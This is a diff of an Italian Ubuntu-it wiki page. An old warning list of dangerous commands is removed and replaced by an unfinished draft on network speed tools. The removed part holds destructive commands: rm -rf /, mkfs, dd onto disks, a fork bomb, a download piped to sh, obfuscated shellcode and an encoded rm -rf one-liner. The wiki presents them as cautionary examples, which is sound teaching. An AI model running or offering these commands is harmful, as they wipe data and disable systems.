|
Dimensione: 7078
Commento:
|
Dimensione: 2074
Commento:
|
| Le cancellazioni sono segnalate in questo modo. | Le aggiunte sono segnalate in questo modo. |
| Linea 1: | Linea 1: |
| ## page was renamed from ComandiDannosi | |
| Linea 5: | Linea 4: |
| <<Indice(width=2)>> <<Informazioni(forum=http://forum.ubuntu-it.org/viewtopic.php?f=46&t=619925&p)>> |
<<Include(NuoviStrumentiWiki/PaginaDiProva)>> <<Indice>> <<Informazioni(forum="https://forum.ubuntu-it.org/viewtopic.php?fxxxxxxxxxxxxxxx"; rilasci="22.04 20.04")>> |
| Linea 10: | Linea 10: |
| A scopo puramente didattico e illustrativo, in questa guida raccoglie una lista di comandi potenzialmente pericolosi. | intro |
| Linea 12: | Linea 12: |
| Si raccomanda di usare particolare prudenza in caso sia necessario eseguire alcuni dei comandi elencati di seguito. Si ricorda che è possibile eseguire in tutta sicurezza comandi potenzialmente dannosi, a scopo di test, all'interno di [[Virtualizzazione|macchine virtuali]]. | = wget = |
| Linea 14: | Linea 14: |
| ||<tablestyle="text-align: justify; width:60%;" style="border:none;" 5%><<Immagine(Icone/Grandi/info.png,,center)>> ||<style="padding:0.5em; border:none;">In caso di dubbi consultare le guide relative al [[AmministrazioneSistema/Terminale|terminale]] e ai [[AmministrazioneSistema/ComandiBase|comandi di base]], oppure rivolgersi ai [[http://www.ubuntu-it.org/supporto|canali di supporto]]. || ||<tablestyle="text-align: justify; width:60%;" style="border:none;" 5%><<Immagine(Icone/Piccole/warning.png,,center)>> ||<style="padding:0.5em; border:none;">'''Gli utenti che pubblicheranno questi comandi all'interno del [[http://forum.ubuntu-it.org|forum di supporto di Ubuntu-it]] verranno permanentemente bannati, attraverso il blocco del loro account.''' || = Comandi da terminale = <<Anchor(rm)>> == Rimozione: rm == * I seguenti comandi cancellano rispettivamente tutti i file, la cartella corrente e i file visibili all'interno della cartella corrente: {{{ rm -rf / rm -rf . rm -rf * |
esempio: {{{ wget -O /dev/null -q --show-progress http://174.138.175.114/PHX-1GB.test |
| Linea 29: | Linea 19: |
| * Qualora si volessero eliminare solamente file nascosti (che hanno primo carattere del nome «`.`», ovvero un punto) il comando {{{ rm -r .* }}} potrebbe provocare risultati inattesi. Infatti, effettuando la scansione della cartella corrente, troverebbe anche l'occorrenza `..` che si riferisce alla cartella di livello superiore. |
= speedtest-cli = |
| Linea 34: | Linea 21: |
| * Al contrario del comando precedente, il seguente comando elimina solo i file nascosti contenuti nella cartella corrente: {{{ rm -r .[^.]* |
È un tool scritto in Python che utilizza il servizio [[https://www.speedtest.net/|Speedtest di Ookla]] tramite riga di comando, senza l'uso di un browser. == Installazione == [[AmministrazioneSistema/InstallareProgrammi|Installare]] il pacchetto [[apt://speedtest-cli | speedtest-cli]]. == Utilizzo == Digitare nel [[Terminale]] il seguente comando:{{{ speedtest-cli |
| Linea 39: | Linea 34: |
| <<Anchor(mkfs)>> == Formattazione: mkfs == |
L'output sarà simile al seguente:{{{ Retrieving speedtest.net configuration... Testing from Fastweb (131.99.27.12)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by Arcolink TLC (Florence) [27.32 km]: 23.58 ms Testing download speed................................................................................ Download: 230.44 Mbit/s Testing upload speed...................................................................................................... Upload: 96.46 Mbit/s |
| Linea 42: | Linea 45: |
| Il comando '''mkfs''' viene utilizzato per formattare supporti di memoria, causando la distruzione di tutti i dati, rimpiazzandoli con un nuovo [[https://it.wikipedia.org/wiki/File_system|filesystem]]. Di seguito è riportato un esempio di come si possa formattare una partizione con filesystem `ext4`, o una partizione in base al suo nome (viene preso come esempio il primo dispositivo `/dev/sda1`). {{{ mkfs mkfs.ext4 mkfs.ext4 /dev/sda1 |
|
| Linea 52: | Linea 47: |
| <<Anchor(dd)>> == Copia di blocchi di dati: dd == |
Varie opzioni, ad esempio:{{{ speedtest --simple }}} |
| Linea 55: | Linea 51: |
| Utilizzando il comando '''dd''' con i [[AmministrazioneSistema/Sudo|privilegi di amministrazione]] e determinati parametri, si può incorrere nella totale perdita dei dati contenuti in un intero dispositivo (incluse quindi eventuali altre partizioni e l'[[https://it.wikipedia.org/wiki/Master_boot_record|MBR]]). | L'output sarà simile al seguente:{{{ Ping: 7.052 ms Download: 250.28 Mbit/s Upload: 98.41 Mbit/s }}} |
| Linea 57: | Linea 57: |
| Ad esempio, dove i parametri `if` e `of` rappresentano rispettivamente i dati da inserire e il dispositivo di destinazione: * `dd if=/dev/zero of=/dev/sda`: riempie il dispositivo con una sequenza di zeri; * `dd if=/dev/null of=/dev/sda`: riempie il dispositivo con una sequenza di zeri; * `dd if=/dev/random of=/dev/sda`: riempie il dispositivo con una sequenza di dati nulli (non memorizzati). |
= CBM = '''CMB''' ('''Color Bandwidth Meter''') è un tool in grado dimostrare l'attività e le proprietà della rete. == Installazione == [[AmministrazioneSistema/InstallareProgrammi|Installare]] il pacchetto [[apt://cbm | cbm]]. == Utilizzo == Digitare nel terminale:{{{ cbm }}} = iftop = descrizione |
| Linea 63: | Linea 76: |
| <<Anchor(fork)>> == Utilizzo sconsiderato di fork() == |
== Utilizzo == |
| Linea 66: | Linea 78: |
| L'utilizzo del comando di sistema '''fork''' permette la creazione di un processo "figlio" avente le stesse caratteristiche del padre. Lanciare però un numero enorme di processi "figli" può causare il blocco del sistema, obbligando l'utente al riavvio forzato con possibile corruzione o danneggiamento dei dati presenti su disco. Alcuni comandi che possono causare tale fenomeno sono: {{{ :(){:|&};: }}} oppure (utilizzando il linguaggio di programmazione [[https://it.wikipedia.org/wiki/Perl|perl]]):{{{ fork while fork |
Digitare nel Terminale: {{{ cbm |
| Linea 75: | Linea 82: |
| <<Anchor(script)>> == Esecuzione script == L'esecuzione di script all'interno di un [[AmministrazioneSistema/Terminale|terminale]] può essere dannosa poiché questi possono contenere al loro interno comandi potenzialmente dannosi o non desiderati. Si raccomanda pertanto di eseguire script suggeriti da fonti fidate. Nei seguenti esempi vengono riportati comandi che scaricano ed eseguono un ipotetico script in bash «`prova.sh`» da un ipotetico indirizzo «`http://sito_internet`»:{{{ wget http://sito_internet/prova.sh sh ./prova.sh }}} {{{ wget http://sito_internet/prova.sh -O- | sh }}} <<Anchor(sorgente)>> = Compilazione codice sorgente = È potenzialmente possibile nascondere del codice pericoloso (o addirittura maligno) all'interno all'interno di [[https://it.wikipedia.org/wiki/Codice_sorgente|sorgenti]] di dimensioni considerevoli. Pertanto si raccomanda di eseguire, compilare e modificare codici provenienti solo da fonti attendibili, quali le piattaforme di distribuzione dove il codice sia consultabile in maniera libera e facile da qualsiasi utente (ad esempio [[https://launchpad.net/|Launchpad]], [[http://sourceforge.net|SourceForge]], [[https://github.com/|GitHub]] ecc.). Un esempio di codice pericoloso è il seguente: {{{ char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"; }}} Apparso all'interno di una [[http://seclists.org/fulldisclosure/2007/Aug/0071.html|mailing list]] come dimostrazione di [[https://it.wikipedia.org/wiki/Exploit|exploit]] da eseguire con i [[AmministrazioneSistema/Sudo|privilegi di amministrazione]], l'esempio precedente può sembrare un codice incomprensibile e affatto pericoloso. In realtà esegue il comando {{{ rm -rf ~ / & }}} che distrugge la cartella '''Home''' dell'utente che ha eseguito il codice compilato. = Archivi Tar = Alcuni archivi [[AmministrazioneSistema/FormatiDiCompressione#tar|tar]] possono provocare spiacevoli inconvenienti e causare danni al sistema. Per ulteriori informazioni consultare [[AmministrazioneSistema/FormatiDiCompressione#tar|questa guida]]. = Altri esempi = L'esecuzione del seguente comando in [[Programmazione/Python|Python]] per una durata di circa 30 secondi ha un effetto disastroso sui file del proprio hard disk: {{{ python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))' }}} Infatti la sintassi `"sn!.sg!+"` sta ad indicare `rm -rf *`, comando a cui è dedicato il relativo [[#rm|paragrafo]]. |
|
| Linea 121: | Linea 83: |
| * [[https://www.speedtest.net/apps/cli|speedtest-cli]] (pagina ufficiale) * [[https://github.com/sivel/speedtest-cli|speedtest-cli (GitHub)]] |
|
| Linea 124: | Linea 88: |
| CategoryAmministrazione | ##CategoryInternet CategoryHomepage |
|
Attenzione! Questa è una Pagina di prova. Le informazioni riportate potrebbero essere incomplete, errate e potenzialmente pericolose. Per contribuire alla realizzazione di questa pagina consultare la discussione di riferimento. |
Guida verificata con Ubuntu: 20.04 22.04
Problemi in questa pagina? Segnalali in questa discussione
Introduzione
intro
wget
esempio:
wget -O /dev/null -q --show-progress http://174.138.175.114/PHX-1GB.test
speedtest-cli
È un tool scritto in Python che utilizza il servizio Speedtest di Ookla tramite riga di comando, senza l'uso di un browser.
Installazione
Installare il pacchetto speedtest-cli.
Utilizzo
Digitare nel Terminale il seguente comando:
speedtest-cli
L'output sarà simile al seguente:
Retrieving speedtest.net configuration... Testing from Fastweb (131.99.27.12)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by Arcolink TLC (Florence) [27.32 km]: 23.58 ms Testing download speed................................................................................ Download: 230.44 Mbit/s Testing upload speed...................................................................................................... Upload: 96.46 Mbit/s
Varie opzioni, ad esempio:
speedtest --simple
L'output sarà simile al seguente:
Ping: 7.052 ms Download: 250.28 Mbit/s Upload: 98.41 Mbit/s
CBM
CMB (Color Bandwidth Meter) è un tool in grado dimostrare l'attività e le proprietà della rete.
Installazione
Installare il pacchetto cbm.
Utilizzo
Digitare nel terminale:
cbm
iftop
descrizione
Utilizzo
Digitare nel Terminale:
cbm
Ulteriori risorse
speedtest-cli (pagina ufficiale)
